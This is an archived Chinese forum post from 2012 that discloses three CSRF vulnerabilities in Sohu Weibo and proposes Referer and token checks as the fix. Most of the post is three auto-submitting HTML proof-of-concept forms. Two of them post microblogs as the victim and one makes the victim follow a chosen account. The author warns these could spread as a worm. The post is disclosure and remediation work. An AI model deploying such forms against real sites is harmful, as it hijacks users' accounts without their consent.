搜狐微博的几处CSRF漏洞分析与解决方法

人行道 發表於 2012-6-27 14:27:51

搜狐微博的几处CSRF漏洞分析与解决方法

<p>搜狐某处CSRF漏洞，可能导致蠕虫蔓延，在未经用户同意的情况下发布微博<br />详细说明：<br />在接受POST和GET的信息的时候，未对POST来路(Referer)进行验证，同时也没有在POST的信息中加token验证信息的正确性，导致漏洞产生。<br /><br />漏洞地址：<br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode13"><br />http://t.sohu.com/t/twAction.jsp<br /><html> www.jb51.net<br /><body><br /><form id="imlonghao" name="imlonghao" action="http://t.sohu.com/t/twAction.jsp" method="post"><br /><input type="text" name="msg" value="XX" /><br /><input type="text" name="act" value="insertTwitter" /><br /><input type="text" name="groupid" value="0" /><br /><input type="submit" value="submit" /><br /></form><br /><script><br /> document.imlonghao.submit();<br /></script><br /></body><br /></html><br /> </div><br /> 接口返回信息<br /> <br /> <img alt="" src="https://img.jbzj.com/file_images/article/201206/2012062714281010.jpg" /><br /> <br />效果<br /><br /><img alt="" src="https://img.jbzj.com/file_images/article/201206/2012062714281011.jpg" /><br />第二个<br /> <br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode14"><br />http://t.sohu.com/t/twAction.jsp<br /><html><br /><body><br /><form id="imlonghao" name="imlonghao" action="http://t.sohu.com/t/twAction.jsp" method="post"><br /><input type="text" name="msg" value="XX" /><br /><input type="text" name="act" value="insertTwitter" /><br /><input type="text" name="groupid" value="0" /><br /><input type="submit" value="submit" /><br /></form><br /><script><br /> document.imlonghao.submit();<br /></script><br /></body><br /></html><br /></div><br /> 返回信息<br /><img alt="" src="https://img.jbzj.com/file_images/article/201206/2012062714281012.jpg" /><br />效果<br /><img alt="" src="https://img.jbzj.com/file_images/article/201206/2012062714281013.jpg" /><br /><strong>第三个：</strong><br />漏洞地址：<br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode15"><br />http://t.sohu.com/follow/addfollows<br /><html> www.jb51.net<br /><body><br /><form id="imlonghao" name="imlonghao" action="http://t.sohu.com/follow/addfollows" method="post"><br /><input type="text" name="act" value="follow" /><br /><input type="text" name="friendids" value="23117291" /><br /><input type="text" name="uid" value="23117291" /><br /><input type="submit" value="submit" /><br /></form><br /><script><br /> document.imlonghao.submit();<br /></script><br /></body><br /></html><br /></div><br /> <img alt="" src="https://img.jbzj.com/file_images/article/201206/2012062714281014.jpg" /> <br />接口返回信息 <br /> <img alt="" src="https://img.jbzj.com/file_images/article/201206/2012062714281015.jpg" /><br />效果 <br /><strong>修复方案：</strong><br />检查POST来路Referer<br />在POST的信息中加token<br /><br />作者：imlonghao </p>

頁: [1]

琼殿技术论坛's Archiver

搜狐微博的几处CSRF漏洞分析与解决方法